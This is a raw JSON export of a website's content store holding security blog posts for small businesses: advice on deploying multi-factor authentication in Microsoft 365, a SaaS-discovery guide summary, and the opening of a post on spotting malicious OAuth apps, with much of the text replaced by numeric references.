MFA",[],{},{"nodeType":178,"data":344165,"content":344166},{},[344167],{"nodeType":173,"value":343921,"marks":344168,"data":344169},[],{},{"nodeType":250,"data":344171,"content":344172},{},[344173,344182,344192,344202,344224],{"nodeType":254,"data":344174,"content":344175},{},[344176],{"nodeType":178,"data":344177,"content":344178},{},[344179],{"nodeType":173,"value":343934,"marks":344180,"data":344181},[],{},{"nodeType":254,"data":344183,"content":344184},{},[344185],{"nodeType":178,"data":344186,"content":344187},{},[344188],{"nodeType":173,"value":344189,"marks":344190,"data":344191},"You can configure MFA enforcement per user, and you can specify which methods can be used.",[],{},{"nodeType":254,"data":344193,"content":344194},{},[344195],{"nodeType":178,"data":344196,"content":344197},{},[344198],{"nodeType":173,"value":344199,"marks":344200,"data":344201},"Users are prompted for MFA on every login.",[],{},{"nodeType":254,"data":344203,"content":344204},{},[344205],{"nodeType":178,"data":344206,"content":344207},{},[344208,344212,344220],{"nodeType":173,"value":344209,"marks":344210,"data":344211},"Management tooling is well...legacy. Only available via a legacy portal that is quite clunky. You can still configure ",[],{},{"nodeType":186,"data":344213,"content":344215},{"uri":344214},"https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates#change-state-using-powershell",[344216],{"nodeType":173,"value":344217,"marks":344218,"data":344219},"via PowerShell",[],{},{"nodeType":173,"value":344221,"marks":344222,"data":344223}," though.",[],{},{"nodeType":254,"data":344225,"content":344226},{},[344227],{"nodeType":178,"data":344228,"content":344229},{},[344230],{"nodeType":173,"value":344231,"marks":344232,"data":344233},"Not recommended by Microsoft or being actively developed.",[],{},{"nodeType":178,"data":344235,"content":344236},{},[344237,344240,344248],{"nodeType":173,"value":344032,"marks":344238,"data":344239},[],{},{"nodeType":186,"data":344241,"content":344243},{"uri":344242},"https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates",[344244],{"nodeType":173,"value":344245,"marks":344246,"data":344247},"How to enable per-user MFA",[],{},{"nodeType":173,"value":37,"marks":344249,"data":344250},[],{},"How to set up Multi-Factor Authentication for Microsoft 365","Conditional Access, Security Defaults, or Legacy? Figuring out how to deploy MFA in Microsoft 365 can be complex. This post summarises your options.",[182376,344254],"Microsoft365","how-to-set-up-multi-factor-authentication-for-microsoft-365",{"items":344257},[344258,344260],{"sys":344259,"name":26133},{"id":26132},{"sys":344261,"name":26137},{"id":26136},{"items":344263},[344264],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":344265},{"url":19129},{"__typename":1528,"sys":344267,"content":344268,"title":298867,"synopsis":344671,"hashTags":344672,"publishedDate":271426,"slug":298868,"tagsCollection":344674,"authorsCollection":344680},{"id":283809},{"json":344269},{"data":344270,"content":344271,"nodeType":165},{},[344272,344279,344285,344291,344297,344304,344311,344442,344448,344454,344461,344468,344475,344482,344489,344496,344503,344510,344517,344537,344544,344551,344654],{"data":344273,"content":344274,"nodeType":178},{},[344275],{"data":344276,"marks":344277,"value":344278,"nodeType":173},{},[],"Multi-Factor Authentication (MFA) - also known as 2 Step Verification (2SV), or 2 Factor Authentication (2FA) - is an additional step when users login to a service in addition to their username and password. Common implementations are things like SMS security codes, or login confirmations on smartphones.",{"data":344280,"content":344281,"nodeType":178},{},[344282],{"data":344283,"marks":344284,"value":37,"nodeType":173},{},[],{"data":344286,"content":344290,"nodeType":312},{"target":344287},{"sys":344288},{"id":344289,"type":317,"linkType":318},"3VqrRPLsLo8yynXCUeigZA",[],{"data":344292,"content":344293,"nodeType":178},{},[344294],{"data":344295,"marks":344296,"value":37,"nodeType":173},{},[],{"data":344298,"content":344299,"nodeType":169},{},[344300],{"data":344301,"marks":344302,"value":344303,"nodeType":173},{},[],"MFA is a security control everyone can agree on",{"data":344305,"content":344306,"nodeType":178},{},[344307],{"data":344308,"marks":344309,"value":344310,"nodeType":173},{},[],"Security people find it notoriously difficult to agree on what the most important security controls are, but there is broad agreement on the value of MFA. This has been accepted and adopted by some big names who are pushing MFA hard because they know it works:",{"data":344312,"content":344313,"nodeType":250},{},[344314,344341,344367,344393,344420],{"data":344315,"content":344316,"nodeType":254},{},[344317],{"data":344318,"content":344319,"nodeType":178},{},[344320,344324,344328,344337],{"data":344321,"marks":344322,"value":1255,"nodeType":173},{},[344323],{"type":370},{"data":344325,"marks":344326,"value":344327,"nodeType":173},{},[],": “",{"data":344329,"content":344331,"nodeType":186},{"uri":344330},"https://www.microsoft.com/security/blog/2019/08/20/one-simple-action-you-can-take-to-prevent-99-9-percent-of-account-attacks/",[344332],{"data":344333,"marks":344334,"value":344336,"nodeType":173},{},[344335],{"type":194},"One simple action you can take to prevent 99.9 percent of attacks on your accounts",{"data":344338,"marks":344339,"value":344340,"nodeType":173},{},[],"”",{"data":344342,"content":344343,"nodeType":254},{},[344344],{"data":344345,"content":344346,"nodeType":178},{},[344347,344351,344355,344364],{"data":344348,"marks":344349,"value":211236,"nodeType":173},{},[344350],{"type":370},{"data":344352,"marks":344353,"value":344354,"nodeType":173},{},[],": “MFA is the best way to protect accounts from inappropriate access” - ",{"data":344356,"content":344358,"nodeType":186},{"uri":344357},"https://aws.amazon.com/blogs/security/top-10-security-items-to-improve-in-your-aws-account/",[344359],{"data":344360,"marks":344361,"value":344363,"nodeType":173},{},[344362],{"type":194},"Top 10 security items to improve in your AWS account",{"data":344365,"marks":344366,"value":37,"nodeType":173},{},[],{"data":344368,"content":344369,"nodeType":254},{},[344370],{"data":344371,"content":344372,"nodeType":178},{},[344373,344377,344381,344390],{"data":344374,"marks":344375,"value":96495,"nodeType":173},{},[344376],{"type":370},{"data":344378,"marks":344379,"value":344380,"nodeType":173},{},[],": “On-device prompts helped prevent 100% of automated bots, 99% of bulk phishing attacks and 90% of targeted attacks.\" - ",{"data":344382,"content":344384,"nodeType":186},{"uri":344383},"https://security.googleblog.com/2019/05/new-research-how-effective-is-basic.html",[344385],{"data":344386,"marks":344387,"value":344389,"nodeType":173},{},[344388],{"type":194},"New research: How effective is basic account hygiene at preventing hijacking",{"data":344391,"marks":344392,"value":10557,"nodeType":173},{},[],{"data":344394,"content":344395,"nodeType":254},{},[344396],{"data":344397,"content":344398,"nodeType":178},{},[344399,344404,344408,344417],{"data":344400,"marks":344401,"value":344403,"nodeType":173},{},[344402],{"type":370},"UK National Cyber Security Centre",{"data":344405,"marks":344406,"value":344407,"nodeType":173},{},[]," (NCSC): “One of the most effective ways of providing additional protection to a password protected account is to use MFA.” - ",{"data":344409,"content":344411,"nodeType":186},{"uri":344410},"https://www.ncsc.gov.uk/collection/passwords/updating-your-approach",[344412],{"data":344413,"marks":344414,"value":344416,"nodeType":173},{},[344415],{"type":194},"Password policy: updating your approach",{"data":344418,"marks":344419,"value":10557,"nodeType":173},{},[],{"data":344421,"content":344422,"nodeType":254},{},[344423],{"data":344424,"content":344425,"nodeType":178},{},[344426,344430,344439],{"data":344427,"marks":344428,"value":344429,"nodeType":173},{},[],"and even Obama: “The President is calling on Americans to move beyond just the password to leverage multiple factors of authentication when logging-in to online accounts.” - ",{"data":344431,"content":344433,"nodeType":186},{"uri":344432},"https://obamawhitehouse.archives.gov/the-press-office/2016/02/09/fact-sheet-cybersecurity-national-action-plan",[344434],{"data":344435,"marks":344436,"value":344438,"nodeType":173},{},[344437],{"type":194},"FACT SHEET: Cybersecurity National Action Plan | whitehouse.gov",{"data":344440,"marks":344441,"value":10557,"nodeType":173},{},[],{"data":344443,"content":344447,"nodeType":312},{"target":344444},{"sys":344445},{"id":344446,"type":317,"linkType":318},"2P5lUU0cEsFy424iV8sNJD",[],{"data":344449,"content":344450,"nodeType":178},{},[344451],{"data":344452,"marks":344453,"value":37,"nodeType":173},{},[],{"data":344455,"content":344456,"nodeType":169},{},[344457],{"data":344458,"marks":344459,"value":344460,"nodeType":173},{},[],"MFA prevents the most common attacks against SMEs",{"data":344462,"content":344463,"nodeType":178},{},[344464],{"data":344465,"marks":344466,"value":344467,"nodeType":173},{},[],"To understand why MFA is a good idea, it helps to understand what you are defending your business against. A number of the most common attacks SMEs will face, including business email compromise and ransomware attacks typically start with the compromise of a single employee’s password. This can happen in many ways - but most often because an employee has used the same password on another website (which got compromised) or because they have been tricked by a phishing attack.",{"data":344469,"content":344470,"nodeType":178},{},[344471],{"data":344472,"marks":344473,"value":344474,"nodeType":173},{},[],"It’s easy to blame employees, or imagine that employee training is the answer. This is probably a mistake because if the last few decades have taught us anything it is that 1) humans are bad at passwords, and 2) they have near boundless creativity when it comes to tricking people.",{"data":344476,"content":344477,"nodeType":178},{},[344478],{"data":344479,"marks":344480,"value":344481,"nodeType":173},{},[],"Instead the data shows you should not rely on passwords for your security. This takes users off the hook, and closes the door on the most common starting point for the most common attacks.",{"data":344483,"content":344484,"nodeType":169},{},[344485],{"data":344486,"marks":344487,"value":344488,"nodeType":173},{},[],"MFA isn’t perfect (but it’s very good)",{"data":344490,"content":344491,"nodeType":178},{},[344492],{"data":344493,"marks":344494,"value":344495,"nodeType":173},{},[],"You might come across nay-sayers that will point out reasons MFA could be bypassed, or why it won’t stop certain attacks - and it’s true, MFA isn't a silver bullet and doesn’t protect against everything, but don’t let this dissuade you! As you can see from all the references at the top of this page, MFA is really good at stopping some of the most common, and consequential attacks out there today. Arguing that it isn’t worth doing because it isn’t perfect is like arguing that there is no point putting a lock on your front door because someone might drive a tank through it - it’s not wrong, it just misses the point.",{"data":344497,"content":344498,"nodeType":169},{},[344499],{"data":344500,"marks":344501,"value":344502,"nodeType":173},{},[],"Start with cloud services",{"data":344504,"content":344505,"nodeType":178},{},[344506],{"data":344507,"marks":344508,"value":344509,"nodeType":173},{},[],"It’s possible to protect almost any type of system using MFA, but the cost and effort might differ wildly. We recommend that you start with cloud services because they are accessible from anywhere in the world, making password compromise a one-step affair for attackers. ",{"data":344511,"content":344512,"nodeType":178},{},[344513],{"data":344514,"marks":344515,"value":344516,"nodeType":173},{},[],"Also, most cloud services make it easy to adopt MFA without buying any third-party software or devices - it’s a bit of a no-brainer. This is where you will get the greatest bang-for-buck (although MFA is often free or already included in your license - so the buck here is your time). ",{"data":344518,"content":344519,"nodeType":178},{},[344520,344524,344533],{"data":344521,"marks":344522,"value":344523,"nodeType":173},{},[],"You can check out ",{"data":344525,"content":344527,"nodeType":186},{"uri":344526},"https://2fa.directory/",[344528],{"data":344529,"marks":344530,"value":344532,"nodeType":173},{},[344531],{"type":194},"Two Factor Auth (2FA)",{"data":344534,"marks":344535,"value":344536,"nodeType":173},{},[]," to see which services support MFA.",{"data":344538,"content":344539,"nodeType":169},{},[344540],{"data":344541,"marks":344542,"value":344543,"nodeType":173},{},[],"Success is all about user experience - and users might even thank you for it (no, really)",{"data":344545,"content":344546,"nodeType":178},{},[344547],{"data":344548,"marks":344549,"value":344550,"nodeType":173},{},[],"Being mindful that MFA has a direct impact on the user experience is key to making it a success. Thankfully, the MFA user experience on cloud services is better today than it’s ever been, and with most users already using MFA somewhere in their personal lives it's less of an ask than it used to be. That said, here are some things you can do to make it a success:",{"data":344552,"content":344553,"nodeType":250},{},[344554,344581,344596,344624,344639],{"data":344555,"content":344556,"nodeType":254},{},[344557],{"data":344558,"content":344559,"nodeType":178},{},[344560,344565,344569,344577],{"data":344561,"marks":344562,"value":344564,"nodeType":173},{},[344563],{"type":370},"Sweeten the pot for users",{"data":344566,"marks":344567,"value":344568,"nodeType":173},{},[]," - once you have MFA in place you might disable some of the most hated password policies like regular password expiry. This is actually recommended by modern password policies anyway. (Don't believe us? ",{"data":344570,"content":344572,"nodeType":186},{"uri":344571},"https://www.ncsc.gov.uk/collection/passwords/updating-your-approach#PasswordGuidance:UpdatingYourApproach-Don'tenforceregularpasswordexpiry",[344573],{"data":344574,"marks":344575,"value":344576,"nodeType":173},{},[],"Read this password guidance",{"data":344578,"marks":344579,"value":344580,"nodeType":173},{},[]," from NCSC).",{"data":344582,"content":344583,"nodeType":254},{},[344584],{"data":344585,"content":344586,"nodeType":178},{},[344587,344592],{"data":344588,"marks":344589,"value":344591,"nodeType":173},{},[344590],{"type":370},"Minimise MFA prompts",{"data":344593,"marks":344594,"value":344595,"nodeType":173},{},[]," - these days most platforms allow you to ask for MFA prompts only when users login from new systems or browsers. This provides a much better user experience and has almost no impact on security.",{"data":344597,"content":344598,"nodeType":254},{},[344599],{"data":344600,"content":344601,"nodeType":178},{},[344602,344607,344611,344620],{"data":344603,"marks":344604,"value":344606,"nodeType":173},{},[344605],{"type":370},"Choose an easy to use MFA method",{"data":344608,"marks":344609,"value":344610,"nodeType":173},{},[]," - getting MFA codes from a phone call isn’t very easy to use, where clicking a button on your mobile, or pressing the fingerprint reader on your laptop is far less irritating. A bit of thought here goes a long way. ",{"data":344612,"content":344615,"nodeType":1698},{"target":344613},{"sys":344614},{"id":270693,"type":317,"linkType":318},[344616],{"data":344617,"marks":344618,"value":344619,"nodeType":173},{},[],"See our blog post",{"data":344621,"marks":344622,"value":344623,"nodeType":173},{},[]," on which MFA methods you should use.",{"data":344625,"content":344626,"nodeType":254},{},[344627],{"data":344628,"content":344629,"nodeType":178},{},[344630,344635],{"data":344631,"marks":344632,"value":344634,"nodeType":173},{},[344633],{"type":370},"Make sure your IT support team is ready for all scenarios",{"data":344636,"marks":344637,"value":344638,"nodeType":173},{},[]," - ensuring that IT support knows exactly what to do in emergencies or when users are locked out is critical to a good user experience. This is not hard to do, but you definitely don’t want to do it for the first time when the user in question is the CEO, and it’s 20 minutes before his big presentation in a country half way across the world - this is how good security dies!",{"data":344640,"content":344641,"nodeType":254},{},[344642],{"data":344643,"content":344644,"nodeType":178},{},[344645,344650],{"data":344646,"marks":344647,"value":344649,"nodeType":173},{},[344648],{"type":370},"Nothing wrong with taking it slow",{"data":344651,"marks":344652,"value":344653,"nodeType":173},{},[]," - too much change too fast tends to ruffle feathers, and rolling out MFA over months rather than weeks can give your IT support team time to scale up their experience and iron out issues before you roll-out to everyone. You might even choose to enable it only for critical most-attacked users such as administrators or finance teams at first. Make sure your security team doesn’t lose focus and never quite gets it finished!",{"data":344655,"content":344656,"nodeType":178},{},[344657,344661,344667],{"data":344658,"marks":344659,"value":344660,"nodeType":173},{},[],"If you found this useful and are thinking about rolling out MFA, you might consider taking a look at ",{"data":344662,"content":344663,"nodeType":186},{"uri":332237},[344664],{"data":344665,"marks":344666,"value":92946,"nodeType":173},{},[],{"data":344668,"marks":344669,"value":344670,"nodeType":173},{},[]," - our entire reason for being is to take the grunt work out of doing this kind of thing.","Why Multi-Factor Authentication (MFA aka 2FA) is so useful for small and medium-sized businesses, and how to deploy it successfully.",[182376,344673],"Guidance",{"items":344675},[344676,344678],{"sys":344677,"name":26133},{"id":26132},{"sys":344679,"name":26137},{"id":26136},{"items":344681},[344682],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":344683},{"url":13981},{"items":344685},[344686],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":344687},{"url":273636},"content:blog:microsoft-rolls-out-security-defaults-for-azure-ad-to-secure-access.json","blog/microsoft-rolls-out-security-defaults-for-azure-ad-to-secure-access.json","blog/microsoft-rolls-out-security-defaults-for-azure-ad-to-secure-access",{"_path":344692,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":344693,"ogImage":118,"summary":344695,"relatedBlogPostsCollection":344706,"title":298859,"subtitle":118,"metaTitle":344708,"synopsis":320972,"hashTags":344709,"publishedDate":320979,"slug":298860,"tagsCollection":344710,"authorsCollection":344716,"content":344720,"_id":345210,"_type":5439,"_source":5440,"_file":345211,"_stem":345212,"_extension":5439},"/blog/rolling-your-own-saas-discovery",{"id":282056,"publishedAt":344694},"2024-03-21T09:19:14.854Z",{"json":344696},{"data":344697,"content":344698,"nodeType":165},{},[344699],{"data":344700,"content":344701,"nodeType":178},{},[344702],{"data":344703,"marks":344704,"value":344705,"nodeType":173},{},[],"We’ve compiled a list of various methods for discovering SaaS use in your organization. In this guide, we’ll explore pros and cons for each approach and introduce you to some new and novel ways to capture SaaS usage, discover unknown SaaS employees are using, and determine how securely it is being used.",{"items":344707},[],"Data sources that support IT asset discovery for cloud apps",[320974,320975,320976,320977,320978],{"items":344711},[344712,344714],{"sys":344713,"name":274157},{"id":274156},{"sys":344715,"name":26137},{"id":26136},{"items":344717},[344718],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":344719},{"url":13981},{"json":344721,"links":345200},{"data":344722,"content":344723,"nodeType":165},{},[344724,344730,344736,344742,344748,344754,344774,344780,344786,344792,344798,344808,344814,344848,344868,344874,344880,344894,344900,344906,344919,344925,344932,344945,344951,344957,344963,344970,344976,344982,344988,345010,345067,345073,345079,345085,345098,345104,345117,345123,345133,345139,345156,345161,345176],{"data":344725,"content":344726,"nodeType":178},{},[344727],{"data":344728,"marks":344729,"value":320422,"nodeType":173},{},[],{"data":344731,"content":344732,"nodeType":178},{},[344733],{"data":344734,"marks":344735,"value":320429,"nodeType":173},{},[],{"data":344737,"content":344738,"nodeType":169},{},[344739],{"data":344740,"marks":344741,"value":320436,"nodeType":173},{},[],{"data":344743,"content":344744,"nodeType":178},{},[344745],{"data":344746,"marks":344747,"value":320443,"nodeType":173},{},[],{"data":344749,"content":344750,"nodeType":178},{},[344751],{"data":344752,"marks":344753,"value":320450,"nodeType":173},{},[],{"data":344755,"content":344756,"nodeType":178},{},[344757,344760,344764,344767,344771],{"data":344758,"marks":344759,"value":320457,"nodeType":173},{},[],{"data":344761,"marks":344762,"value":320462,"nodeType":173},{},[344763],{"type":1646},{"data":344765,"marks":344766,"value":320466,"nodeType":173},{},[],{"data":344768,"marks":344769,"value":320471,"nodeType":173},{},[344770],{"type":1646},{"data":344772,"marks":344773,"value":320475,"nodeType":173},{},[],{"data":344775,"content":344776,"nodeType":178},{},[344777],{"data":344778,"marks":344779,"value":320482,"nodeType":173},{},[],{"data":344781,"content":344782,"nodeType":169},{},[344783],{"data":344784,"marks":344785,"value":320489,"nodeType":173},{},[],{"data":344787,"content":344788,"nodeType":178},{},[344789],{"data":344790,"marks":344791,"value":320496,"nodeType":173},{},[],{"data":344793,"content":344794,"nodeType":169},{},[344795],{"data":344796,"marks":344797,"value":320503,"nodeType":173},{},[],{"data":344799,"content":344800,"nodeType":178},{},[344801,344804],{"data":344802,"marks":344803,"value":13836,"nodeType":173},{},[],{"data":344805,"marks":344806,"value":320514,"nodeType":173},{},[344807],{"type":1646},{"data":344809,"content":344810,"nodeType":178},{},[344811],{"data":344812,"marks":344813,"value":320521,"nodeType":173},{},[],{"data":344815,"content":344816,"nodeType":178},{},[344817,344820,344824,344827,344831,344834,344838,344841,344845],{"data":344818,"marks":344819,"value":320528,"nodeType":173},{},[],{"data":344821,"marks":344822,"value":320462,"nodeType":173},{},[344823],{"type":1646},{"data":344825,"marks":344826,"value":320536,"nodeType":173},{},[],{"data":344828,"marks":344829,"value":320541,"nodeType":173},{},[344830],{"type":1646},{"data":344832,"marks":344833,"value":320545,"nodeType":173},{},[],{"data":344835,"marks":344836,"value":320462,"nodeType":173},{},[344837],{"type":1646},{"data":344839,"marks":344840,"value":320553,"nodeType":173},{},[],{"data":344842,"marks":344843,"value":320471,"nodeType":173},{},[344844],{"type":1646},{"data":344846,"marks":344847,"value":1477,"nodeType":173},{},[],{"data":344849,"content":344850,"nodeType":178},{},[344851,344854,344858,344861,344865],{"data":344852,"marks":344853,"value":320567,"nodeType":173},{},[],{"data":344855,"marks":344856,"value":320572,"nodeType":173},{},[344857],{"type":1646},{"data":344859,"marks":344860,"value":320576,"nodeType":173},{},[],{"data":344862,"marks":344863,"value":320581,"nodeType":173},{},[344864],{"type":1646},{"data":344866,"marks":344867,"value":320585,"nodeType":173},{},[],{"data":344869,"content":344870,"nodeType":178},{},[344871],{"data":344872,"marks":344873,"value":320592,"nodeType":173},{},[],{"data":344875,"content":344876,"nodeType":169},{},[344877],{"data":344878,"marks":344879,"value":320599,"nodeType":173},{},[],{"data":344881,"content":344882,"nodeType":178},{},[344883,344887,344890],{"data":344884,"marks":344885,"value":320607,"nodeType":173},{},[344886],{"type":1646},{"data":344888,"marks":344889,"value":3107,"nodeType":173},{},[],{"data":344891,"marks":344892,"value":320615,"nodeType":173},{},[344893],{"type":1646},{"data":344895,"content":344896,"nodeType":178},{},[344897],{"data":344898,"marks":344899,"value":320622,"nodeType":173},{},[],{"data":344901,"content":344902,"nodeType":178},{},[344903],{"data":344904,"marks":344905,"value":320629,"nodeType":173},{},[],{"data":344907,"content":344908,"nodeType":178},{},[344909,344912,344916],{"data":344910,"marks":344911,"value":320636,"nodeType":173},{},[],{"data":344913,"marks":344914,"value":320641,"nodeType":173},{},[344915],{"type":1646},{"data":344917,"marks":344918,"value":320645,"nodeType":173},{},[],{"data":344920,"content":344921,"nodeType":169},{},[344922],{"data":344923,"marks":344924,"value":320652,"nodeType":173},{},[],{"data":344926,"content":344927,"nodeType":178},{},[344928],{"data":344929,"marks":344930,"value":320660,"nodeType":173},{},[344931],{"type":1646},{"data":344933,"content":344934,"nodeType":178},{},[344935,344938,344942],{"data":344936,"marks":344937,"value":320667,"nodeType":173},{},[],{"data":344939,"marks":344940,"value":320672,"nodeType":173},{},[344941],{"type":1646},{"data":344943,"marks":344944,"value":320676,"nodeType":173},{},[],{"data":344946,"content":344947,"nodeType":178},{},[344948],{"data":344949,"marks":344950,"value":320683,"nodeType":173},{},[],{"data":344952,"content":344953,"nodeType":178},{},[344954],{"data":344955,"marks":344956,"value":320690,"nodeType":173},{},[],{"data":344958,"content":344959,"nodeType":169},{},[344960],{"data":344961,"marks":344962,"value":320697,"nodeType":173},{},[],{"data":344964,"content":344965,"nodeType":178},{},[344966],{"data":344967,"marks":344968,"value":320705,"nodeType":173},{},[344969],{"type":1646},{"data":344971,"content":344972,"nodeType":178},{},[344973],{"data":344974,"marks":344975,"value":320712,"nodeType":173},{},[],{"data":344977,"content":344978,"nodeType":178},{},[344979],{"data":344980,"marks":344981,"value":320719,"nodeType":173},{},[],{"data":344983,"content":344984,"nodeType":178},{},[344985],{"data":344986,"marks":344987,"value":320726,"nodeType":173},{},[],{"data":344989,"content":344990,"nodeType":178},{},[344991,344994,344998,345001,345007],{"data":344992,"marks":344993,"value":320733,"nodeType":173},{},[],{"data":344995,"marks":344996,"value":221172,"nodeType":173},{},[344997],{"type":370},{"data":344999,"marks":345000,"value":320741,"nodeType":173},{},[],{"data":345002,"content":345003,"nodeType":186},{"uri":320744},[345004],{"data":345005,"marks":345006,"value":320749,"nodeType":173},{},[],{"data":345008,"marks":345009,"value":320753,"nodeType":173},{},[],{"data":345011,"content":345012,"nodeType":250},{},[345013,345022,345031,345040,345049,345058],{"data":345014,"content":345015,"nodeType":254},{},[345016],{"data":345017,"content":345018,"nodeType":178},{},[345019],{"data":345020,"marks":345021,"value":320766,"nodeType":173},{},[],{"data":345023,"content":345024,"nodeType":254},{},[345025],{"data":345026,"content":345027,"nodeType":178},{},[345028],{"data":345029,"marks":345030,"value":320776,"nodeType":173},{},[],{"data":345032,"content":345033,"nodeType":254},{},[345034],{"data":345035,"content":345036,"nodeType":178},{},[345037],{"data":345038,"marks":345039,"value":320786,"nodeType":173},{},[],{"data":345041,"content":345042,"nodeType":254},{},[345043],{"data":345044,"content":345045,"nodeType":178},{},[345046],{"data":345047,"marks":345048,"value":320796,"nodeType":173},{},[],{"data":345050,"content":345051,"nodeType":254},{},[345052],{"data":345053,"content":345054,"nodeType":178},{},[345055],{"data":345056,"marks":345057,"value":320806,"nodeType":173},{},[],{"data":345059,"content":345060,"nodeType":254},{},[345061],{"data":345062,"content":345063,"nodeType":178},{},[345064],{"data":345065,"marks":345066,"value":320816,"nodeType":173},{},[],{"data":345068,"content":345069,"nodeType":178},{},[345070],{"data":345071,"marks":345072,"value":320823,"nodeType":173},{},[],{"data":345074,"content":345075,"nodeType":178},{},[345076],{"data":345077,"marks":345078,"value":320830,"nodeType":173},{},[],{"data":345080,"content":345081,"nodeType":169},{},[345082],{"data":345083,"marks":345084,"value":309064,"nodeType":173},{},[],{"data":345086,"content":345087,"nodeType":178},{},[345088,345091,345095],{"data":345089,"marks":345090,"value":320843,"nodeType":173},{},[],{"data":345092,"marks":345093,"value":320848,"nodeType":173},{},[345094],{"type":1646},{"data":345096,"marks":345097,"value":320852,"nodeType":173},{},[],{"data":345099,"content":345100,"nodeType":235},{},[345101],{"data":345102,"marks":345103,"value":320859,"nodeType":173},{},[],{"data":345105,"content":345106,"nodeType":178},{},[345107,345110,345114],{"data":345108,"marks":345109,"value":320866,"nodeType":173},{},[],{"data":345111,"marks":345112,"value":320871,"nodeType":173},{},[345113],{"type":1646},{"data":345115,"marks":345116,"value":320875,"nodeType":173},{},[],{"data":345118,"content":345119,"nodeType":178},{},[345120],{"data":345121,"marks":345122,"value":320882,"nodeType":173},{},[],{"data":345124,"content":345125,"nodeType":178},{},[345126,345130],{"data":345127,"marks":345128,"value":320890,"nodeType":173},{},[345129],{"type":1646},{"data":345131,"marks":345132,"value":320894,"nodeType":173},{},[],{"data":345134,"content":345135,"nodeType":178},{},[345136],{"data":345137,"marks":345138,"value":320901,"nodeType":173},{},[],{"data":345140,"content":345141,"nodeType":178},{},[345142,345146,345149,345153],{"data":345143,"marks":345144,"value":320909,"nodeType":173},{},[345145],{"type":1646},{"data":345147,"marks":345148,"value":320913,"nodeType":173},{},[],{"data":345150,"marks":345151,"value":320918,"nodeType":173},{},[345152],{"type":1646},{"data":345154,"marks":345155,"value":10557,"nodeType":173},{},[],{"data":345157,"content":345160,"nodeType":312},{"target":345158},{"sys":345159},{"id":320926,"type":317,"linkType":318},[],{"data":345162,"content":345163,"nodeType":178},{},[345164,345167,345173],{"data":345165,"marks":345166,"value":320934,"nodeType":173},{},[],{"data":345168,"content":345169,"nodeType":186},{"uri":320744},[345170],{"data":345171,"marks":345172,"value":320941,"nodeType":173},{},[],{"data":345174,"marks":345175,"value":1477,"nodeType":173},{},[],{"data":345177,"content":345178,"nodeType":178},{},[345179,345182,345188,345191,345197],{"data":345180,"marks":345181,"value":320951,"nodeType":173},{},[],{"data":345183,"content":345184,"nodeType":186},{"uri":117883},[345185],{"data":345186,"marks":345187,"value":320958,"nodeType":173},{},[],{"data":345189,"marks":345190,"value":1464,"nodeType":173},{},[],{"data":345192,"content":345193,"nodeType":186},{"uri":117869},[345194],{"data":345195,"marks":345196,"value":117876,"nodeType":173},{},[],{"data":345198,"marks":345199,"value":320971,"nodeType":173},{},[],{"entries":345201},{"hyperlink":345202,"inline":345203,"block":345204},[],[],[345205],{"sys":345206,"__typename":5345,"title":345207,"caption":118,"layoutMode":112585,"file":345208},{"id":320926},"Phone show user-powered Slack message",{"url":345209,"width":272755,"height":142427},"https://images.ctfassets.net/y1cdw1ablpvd/2fkn8Dn369b7spFF3pOQM5/a7d49e9c6e960dd28aa82cbc88766ed7/Screenshot_2022-05-10_at_22.45.38.png","content:blog:rolling-your-own-saas-discovery.json","blog/rolling-your-own-saas-discovery.json","blog/rolling-your-own-saas-discovery",{"_path":345214,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":345215,"ogImage":118,"summary":345217,"relatedBlogPostsCollection":345228,"title":334369,"subtitle":118,"metaTitle":345230,"synopsis":334370,"hashTags":118,"publishedDate":334371,"slug":334372,"tagsCollection":345231,"authorsCollection":345237,"content":345241,"_id":345638,"_type":5439,"_source":5440,"_file":345639,"_stem":345640,"_extension":5439},"/blog/how-to-find-a-malicious-oauth-app-on-microsoft-365",{"id":333925,"publishedAt":345216},"2024-03-21T09:02:41.172Z",{"json":345218},{"data":345219,"content":345220,"nodeType":165},{},[345221],{"data":345222,"content":345223,"nodeType":178},{},[345224],{"data":345225,"marks":345226,"value":345227,"nodeType":173},{},[],"Despite measures by Microsoft to address the issue, consent phishing is still on the rise. When hunting for malicious OAuth apps, the most important things to look at are the permissions and reply URLs. Publisher verification status, or install count, are sometimes useful while other factors can be completely ignored.",{"items":345229},[],"Find a malicious OAuth app on Microsoft O365 ",{"items":345232},[345233,345235],{"sys":345234,"name":26137},{"id":26136},{"sys":345236,"name":509},{"id":508},{"items":345238},[345239],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":345240},{"url":19129},{"json":345242,"links":345615},{"data":345243,"content":345244,"nodeType":165},{},[345245,345271,345274,345280,345286,345291,345297,345310,345316,345322,345338,345388,345391,345397,345452,345465,345471,345477,345493,345499,345516,345522,345528,345534,345540,345546,345552,345557,345563,345569,345582,345585,345600],{"data":345246,"content":345247,"nodeType":178},{},[345248,345251,345258,345261,345268],{"data":345249,"marks":345250,"value":333936,"nodeType":173},{},[],{"data":345252,"content":345253,"nodeType":186},{"uri":333939},[345254],{"data":345255,"marks":345256,"value":333945,"nodeType":173},{},[345257],{"type":194},{"data":345259,"marks":345260,"value":333949,"nodeType":173},{},[],{"data":345262,"content":345263,"nodeType":186},{"uri":331178},[345264],{"data":345265,"marks":345266,"value":333957,"nodeType":173},{},[345267],{"type":194},{"data":345269,"marks":345270,"value":333961,"nodeType":173},{},[],{"data":345272,"content":345273,"nodeType":231},{},[],{"data":345275,"content":345276,"nodeType":178},{},[345277],{"data":345278,"marks":345279,"value":333971,"nodeType":173},{},[],{"data":345281,"content":345282,"nodeType":178},{},[345283],{"data":345284,"marks":345285,"value":333978,"nodeType":173},{},[],{"data":345287,"content":345290,"nodeType":312},{"target":345288},{"sys":345289},{"id":271484,"type":317,"linkType":318},[],{"data":345292,"content":345293,"nodeType":178},{},[345294],{"data":345295,"marks":345296,"value":333990,"nodeType":173},{},[],{"data":345298,"content":345299,"nodeType":178},{},[345300,345303,345307],{"data":345301,"marks":345302,"value":333997,"nodeType":173},{},[],{"data":345304,"marks":345305,"value":334002,"nodeType":173},{},[345306],{"type":370},{"data":345308,"marks":345309,"value":334006,"nodeType":173},{},[],{"data":345311,"cont